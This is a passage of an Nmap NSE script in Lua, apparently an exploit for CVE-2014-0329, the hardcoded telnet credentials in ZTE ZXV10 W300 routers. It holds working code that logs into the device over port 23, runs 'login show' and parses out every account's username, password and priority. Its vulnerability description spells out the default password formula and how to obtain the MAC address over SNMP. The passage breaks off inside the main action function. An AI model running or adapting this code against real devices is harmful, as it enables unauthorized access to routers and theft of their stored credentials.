ZTE ZXV10 W300无线路由器硬编码凭证安全措施绕过漏(2)

local dump_creds = function(host, user, password)
    local socket, status, response
   
    socket = nmap.new_socket("tcp")
    socket:set_timeout(5000)
   
    status, response = socket:connect(host, 23)
   
    if not status then
        socket:close()
        return status, response
    end
   
    local payload
    payload = user .. "\r" .. password .. "\rsh\rlogin show\rexit\r"
   
    status, response = socket:send(payload)
   
    if not status then
        socket:close()
        return status, response
    end
   
    status, response = socket:receive_buf("exit", false)
   
    if not status then
        socket:close()
        return status, response
    end
   
    socket:close()
   
    return true, response
end

local parse_response = function(response)
    local index
   
    index = string.find(response, "Username +Password +Priority")
   
    if not index then
        return false, "Unexpected response value."
    end

index = string.find(response, "\r\n", index) + 2
    response = string.sub(response, index)

local result, endl, line
    result = {}
   
    index = 0
    endl = string.find(response, "\r\n", index)

while endl do
        line = string.sub(response, index, endl)
        line = string.gsub(line, "\r", "")
        line = string.gsub(line, "^ +", "")
        line = string.gsub(line, " +$", "")
        line = string.gsub(line, " +", " ")
       
        local user, pass, prio
        for user, pass, prio in string.gmatch(line, "([^ ]+) ([^ ]+) ([^ ]+)") do
            local aux = {}
            aux['username'] = user
            aux['password'] = pass
            aux['priority'] = prio
            table.insert(result, aux)
        end
       
        index = endl + 2
        endl = string.find(response, "\r\n", index)
    end
   
    return true, result
end

action = function(host)
    local vuln = {
        title = "ZTE ZXV10 W300 router contains hardcoded credentials",
        state = vulns.STATE.NOT_VULN,
        IDS = {CVE = 'CVE-2014-0329'},
        risk_factor = "High",
        scores = {
            CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
        },
        description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
service on the device. The username is "admin" and the password is "XXXXairocon"
where "XXXX" is the last four characters of the device's MAC address. The MAC address
is obtainable over SNMP with community string public.]],
        references = {
            "https://www.kb.cert.org/vuls/id/228886",
            "https://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html"
        },
        dates = {
            disclosure = {year = 2014, month = 2, day = 3},
        },
        exploit_results = {},
    }